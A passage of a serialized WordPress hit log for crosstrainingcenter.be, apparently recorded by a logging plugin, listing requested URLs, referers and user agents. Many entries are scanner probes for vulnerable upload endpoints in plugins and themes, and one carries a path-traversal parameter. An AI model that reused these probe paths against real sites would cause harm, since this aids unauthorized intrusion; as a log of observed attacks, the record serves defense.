Firefox/22.0\";}s:13:\"last_hit_time\";i:1393947497;}s:38:\"http://www.crosstrainingcenter.be/?p=3\";a:5:{s:9:\"hit_count\";i:9;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:38:\"http://www.crosstrainingcenter.be/?p=3\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393947899;}s:38:\"http://www.crosstrainingcenter.be/?p=4\";a:5:{s:9:\"hit_count\";i:7;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:38:\"http://www.crosstrainingcenter.be/?p=4\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393948249;}s:38:\"http://www.crosstrainingcenter.be/?p=6\";a:5:{s:9:\"hit_count\";i:4;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:38:\"http://www.crosstrainingcenter.be/?p=6\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393948525;}s:99:\"http://www.crosstrainingcenter.be/wp-content/plugins/advanced-custom-fields/core/actions/export.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:99:\"http://www.crosstrainingcenter.be/wp-content/plugins/advanced-custom-fields/core/actions/export.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393948758;}s:100:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:100:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php\";}s:11:\"user_agents\";a:2:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";i:1;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36\";}s:13:\"last_hit_time\";i:1468519178;}s:89:\"http://www.crosstrainingcenter.be/wp-content/themes/clockstone/theme/functions/upload.php\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:89:\"http://www.crosstrainingcenter.be/wp-content/themes/clockstone/theme/functions/upload.php\";i:1;s:85:\"http://crosstrainingcenter.be/wp-content/themes/clockstone/theme/functions/upload.php\";}s:11:\"user_agents\";a:2:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";i:1;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36\";}s:13:\"last_hit_time\";i:1466158369;}s:96:\"http://www.crosstrainingcenter.be/wp-content/themes/deep-blue/megaframe/megapanel/inc/upload.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:96:\"http://www.crosstrainingcenter.be/wp-content/themes/deep-blue/megaframe/megapanel/inc/upload.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393948871;}s:129:\"http://www.crosstrainingcenter.be/wp-content/plugins/zingiri-web-shop/fwkfor/ajax/uploadfilexd.php?fh=/../../../../../../wp-admin\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:129:\"http://www.crosstrainingcenter.be/wp-content/plugins/zingiri-web-shop/fwkfor/ajax/uploadfilexd.php?fh=/../../../../../../wp-admin\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393948905;}s:79:\"http://www.crosstrainingcenter.be/wp-content/plugins/wpstorecart/php/upload.php\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:79:\"http://www.crosstrainingcenter.be/wp-content/plugins/wpstorecart/php/upload.php\";i:1;s:22:\"http://www.google.com/\";}s:11:\"user_agents\";a:2:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";i:1;s:112:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36\";}s:13:\"last_hit_time\";i:1485153886;}s:101:\"http://www.crosstrainingcenter.be/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php\";a:5:{s:9:\"hit_count\";i:4;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:101:\"http://www.crosstrainingcenter.be/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php\";i:1;s:97:\"http://crosstrainingcenter.be/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php\";}s:11:\"user_agents\";a:2:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";i:1;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36\";}s:13:\"last_hit_time\";i:1470237568;}s:93:\"http://www.crosstrainingcenter.be/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:93:\"http://www.crosstrainingcenter.be/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393948988;}s:91:\"http://www.crosstrainingcenter.be/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:91:\"http://www.crosstrainingcenter.be/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393949015;}s:96:\"http://www.crosstrainingcenter.be/wp-content/plugins/mini-mail-dashboard-widget/wp-mini-mail.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:96:\"http://www.crosstrainingcenter.be/wp-content/plugins/mini-mail-dashboard-widget/wp-mini-mail.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393949045;}s:96:\"http://www.crosstrainingcenter.be/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:96:\"http://www.crosstrainingcenter.be/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1393949070;}s:96:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:96:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php\";}s:11:\"user_agents\";a:2:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";i:1;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36\";}s:13:\"last_hit_time\";i:1471349660;}s:92:\"http://www.crosstrainingcenter.be/wp-content/themes/OptimizePress/lib/admin/media-upload.php\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:92:\"http://www.crosstrainingcenter.be/wp-content/themes/OptimizePress/lib/admin/media-upload.php\";i:1;s:88:\"http://crosstrainingcenter.be/wp-content/themes/OptimizePress/lib/admin/media-upload.php\";}s:11:\"user_agents\";a:2:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";i:1;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36\";}s:13:\"last_hit_time\";i:1466635743;}s:103:\"http://www.crosstrainingcenter.be/notified-Notify_page?aHR0cDovL3d3dy5jcm9zc3RyYWluaW5nY2VudGVyLmJlLw==\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:193:\"http://www.google.be/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=1&ved=0CCoQFjAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&ei=wEUYU5y2CI-qhAfp14HoDw&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ\";}s:11:\"user_agents\";a:1:{i:0;s:178:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322; InfoPath.2; .NET4.0C; .NET4.0E)\";}s:13:\"last_hit_time\";i:1394099653;}s:101:\"http://www.crosstrainingcenter.be/verify-Notify_page?aHR0cDovL3d3dy5jcm9zc3RyYWluaW5nY2VudGVyLmJlLw==\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:215:\"http://www.google.be/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=2&ved=0CDAQFjAB&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&ei=CkkYU_eDJImUhQfbh4GYBQ&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ&bvm=bv.62577051,d.ZG4\";}s:11:\"user_agents\";a:1:{i:0;s:178:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322; InfoPath.2)\";}s:13:\"last_hit_time\";i:1394100498;}s:45:\"http://www.crosstrainingcenter.be/default.php\";a:5:{s:9:\"hit_count\";i:5;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:45:\"http://www.crosstrainingcenter.be/default.php\";i:1;s:22:\"http://www.google.com/\";}s:11:\"user_agents\";a:2:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";i:1;s:112:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36\";}s:13:\"last_hit_time\";i:1490245253;}s:48:\"http://www.crosstrainingcenter.be/administrator/\";a:5:{s:9:\"hit_count\";i:10;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:53:\"http://crosstrainingcenter.be/administrator/index.php\";i:1;s:48:\"http://www.crosstrainingcenter.be/administrator/\";}s:11:\"user_agents\";a:9:{i:0;s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";i:1;s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0\";i:2;s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0\";i:3;s:102:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36\";i:4;s:71:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)\";i:5;s:63:\"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\";i:6;s:65:\"Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0\";i:7;s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36\";i:8;s:65:\"Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0\";}s:13:\"last_hit_time\";i:1488392735;}s:43:\"http://www.crosstrainingcenter.be/contact/(\";a:5:{s:9:\"hit_count\";i:17;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:42:\"http://www.crosstrainingcenter.be/contact/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1462464184;}s:81:\"http://www.crosstrainingcenter.be/contact/this.options[this.selectedIndex].value;\";a:5:{s:9:\"hit_count\";i:17;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:43:\"http://www.crosstrainingcenter.be/contact/(\";i:1;s:45:\"http://www.crosstrainingcenter.be/contact/url\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1462464185;}s:99:\"http://www.crosstrainingcenter.be/fckeditor/editor/filemanager/browser/default/connectors/test.html\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:99:\"http://www.crosstrainingcenter.be/fckeditor/editor/filemanager/browser/default/connectors/test.html\";}s:11:\"user_agents\";a:1:{i:0;s:75:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\";}s:13:\"last_hit_time\";i:1404104739;}s:105:\"http://www.crosstrainingcenter.be/admin/fckeditor/editor/filemanager/browser/default/connectors/test.html\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:105:\"http://www.crosstrainingcenter.be/admin/fckeditor/editor/filemanager/browser/default/connectors/test.html\";}s:11:\"user_agents\";a:1:{i:0;s:75:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\";}s:13:\"last_hit_time\";i:1404104750;}s:89:\"http://www.crosstrainingcenter.be/editor/filemanager/browser/default/connectors/test.html\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:89:\"http://www.crosstrainingcenter.be/editor/filemanager/browser/default/connectors/test.html\";}s:11:\"user_agents\";a:1:{i:0;s:75:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\";}s:13:\"last_hit_time\";i:1404104755;}s:85:\"http://www.crosstrainingcenter.be/admin/fckeditor/editor/filemanager/upload/test.html\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:85:\"http://www.crosstrainingcenter.be/admin/fckeditor/editor/filemanager/upload/test.html\";}s:11:\"user_agents\";a:1:{i:0;s:75:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\";}s:13:\"last_hit_time\";i:1404104792;}s:89:\"http://www.crosstrainingcenter.be/admin/fckeditor/editor/filemanager/connectors/test.html\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:89:\"http://www.crosstrainingcenter.be/admin/fckeditor/editor/filemanager/connectors/test.html\";}s:11:\"user_agents\";a:1:{i:0;s:75:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\";}s:13:\"last_hit_time\";i:1404104793;}s:69:\"http://www.crosstrainingcenter.be/fckeditor/_samples/asp/sample01.asp\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:69:\"http://www.crosstrainingcenter.be/fckeditor/_samples/asp/sample01.asp\";}s:11:\"user_agents\";a:1:{i:0;s:75:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\";}s:13:\"last_hit_time\";i:1404104795;}s:61:\"http://www.crosstrainingcenter.be/.google-analytics.com/ga.js\";a:5:{s:9:\"hit_count\";i:6;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:34:\"http://www.crosstrainingcenter.be/\";i:1;s:22:\"http://m.facebook.com/\";}s:11:\"user_agents\";a:5:{i:0;s:164:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC)\";i:1;s:189:\"Mozilla/5.0 (Linux; Android 5.1; HUAWEI RIO-L01 Build/HuaweiRIO-L01) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/88.0.0.22.76;]\";i:2;s:178:\"Mozilla/5.0 (Linux; Android 4.4.2; GT-I9195 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/88.0.0.22.76;]\";i:3;s:183:\"Mozilla/5.0 (Linux; Android 5.0.2; 7044X Build/LRX22G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.98 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/89.0.0.17.70;]\";i:4;s:172:\"Mozilla/5.0 (Linux; U; Android 4.2.2; fr-be; GT-I8200N Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 [FB_IAB/FB4A;FBAV/89.0.0.17.70;]\";}s:13:\"last_hit_time\";i:1471466279;}s:71:\"http://www.crosstrainingcenter.be/wp-content/plugins/wptouch/readme.txt\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:67:\"http://crosstrainingcenter.be/wp-content/plugins/wptouch/readme.txt\";}s:11:\"user_agents\";a:1:{i:0;s:77:\"Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:27.0) Gecko/20121011 Firefox/27.0\";}s:13:\"last_hit_time\";i:1408121818;}s:92:\"http://www.crosstrainingcenter.be/wp-content/uploads/wysija/themes/xutgvwwr/hauptgericht.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:92:\"http://www.crosstrainingcenter.be/wp-content/uploads/wysija/themes/xutgvwwr/hauptgericht.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1408489555;}s:120:\"http://www.crosstrainingcenter.be/wp-content/plugins/akismet/readme.txtwp-content/plugins/wp_optin_pro/media-uploads.php\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:120:\"http://www.crosstrainingcenter.be/wp-content/plugins/akismet/readme.txtwp-content/plugins/wp_optin_pro/media-uploads.php\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1409565626;}s:40:\"http://www.crosstrainingcenter.be/drupal\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:36:\"http://crosstrainingcenter.be/drupal\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1409666326;}s:38:\"http://www.crosstrainingcenter.be/blog\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:34:\"http://crosstrainingcenter.be/blog\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1466627058;}s:40:\"http://www.crosstrainingcenter.be/joomla\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:36:\"http://crosstrainingcenter.be/joomla\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1409666330;}s:43:\"http://www.crosstrainingcenter.be/wordpress\";a:5:{s:9:\"hit_count\";i:5;s:6:\"is_new\";b:1;s:8:\"referers\";a:4:{i:0;s:39:\"http://crosstrainingcenter.be/wordpress\";i:1;s:34:\"http://www.crosstrainingcenter.be/\";i:2;s:45:\"http://www.crossroadsatbigcreek.com/wordpress\";i:3;s:40:\"http://www.crossfitnorfolk.com/wordpress\";}s:11:\"user_agents\";a:4:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";i:1;s:129:\"Mozilla/4.0 (compatible  MSIE 6.0  Windows NT 5.1  SV1  .NET CLR 1.1.4322  InfoPath.2  .NET CLR 2.0.50727  .NET CLR 3.0.04506.30)\";i:2;s:57:\"Opera/9.62 (Windows NT 5.1  U  YB/3.5.1  ru) Presto/2.1.1\";i:3;s:85:\"Opera/9.80 (Windows NT 5.1  U  MRA 5.7 (build 03757)  ru) Presto/2.2.15 Version/10.10\";}s:13:\"last_hit_time\";i:1479907171;}s:36:\"http://www.crosstrainingcenter.be/wp\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:32:\"http://crosstrainingcenter.be/wp\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1409666340;}s:81:\"http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/1281178363.png\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:52:\"msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)\";}s:13:\"last_hit_time\";i:1413543849;}s:71:\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:64:\"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\";}s:13:\"last_hit_time\";i:1416396358;}s:92:\"http://www.crosstrainingcenter.be/&q=Cross%20Training%20Center%20%28Namur%20-%20Limelette%29\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:34:\"http://www.crosstrainingcenter.be/\";}s:11:\"user_agents\";a:1:{i:0;s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\";}s:13:\"last_hit_time\";i:1412621960;}s:119:\"http://www.crosstrainingcenter.be/wp-content/plugins/akismet/readme.txtwp-content/plugins/gravityforms/css/browsers.css\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:119:\"http://www.crosstrainingcenter.be/wp-content/plugins/akismet/readme.txtwp-content/plugins/gravityforms/css/browsers.css\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1412976466;}s:82:\"http://www.crosstrainingcenter.be/wp-content/plugins/gravityforms/css/browsers.css\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:82:\"http://www.crosstrainingcenter.be/wp-content/plugins/gravityforms/css/browsers.css\";i:1;s:78:\"http://crosstrainingcenter.be/wp-content/plugins/gravityforms/css/browsers.css\";}s:11:\"user_agents\";a:2:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";i:1;s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20120101 Firefox/33.0\";}s:13:\"last_hit_time\";i:1424096283;}s:61:\"http://www.crosstrainingcenter.be/inc/uploadify/uploadify.swf\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:57:\"http://crosstrainingcenter.be/inc/uploadify/uploadify.swf\";i:1;s:61:\"http://www.crosstrainingcenter.be/inc/uploadify/uploadify.swf\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1426350268;}s:61:\"http://www.crosstrainingcenter.be/lib/uploadify/uploadify.swf\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:57:\"http://crosstrainingcenter.be/lib/uploadify/uploadify.swf\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1413332355;}s:60:\"http://www.crosstrainingcenter.be/js/uploadify/uploadify.swf\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:56:\"http://crosstrainingcenter.be/js/uploadify/uploadify.swf\";i:1;s:60:\"http://www.crosstrainingcenter.be/js/uploadify/uploadify.swf\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1482542096;}s:96:\"http://crosstrainingcenter.be/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:96:\"http://crosstrainingcenter.be/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1414120281;}s:92:\"http://crosstrainingcenter.be/wp-content/themes/deep-blue/megaframe/megapanel/inc/upload.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:92:\"http://crosstrainingcenter.be/wp-content/themes/deep-blue/megaframe/megapanel/inc/upload.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1414120340;}s:92:\"http://crosstrainingcenter.be/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:92:\"http://crosstrainingcenter.be/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1414120615;}s:92:\"http://crosstrainingcenter.be/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:92:\"http://crosstrainingcenter.be/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 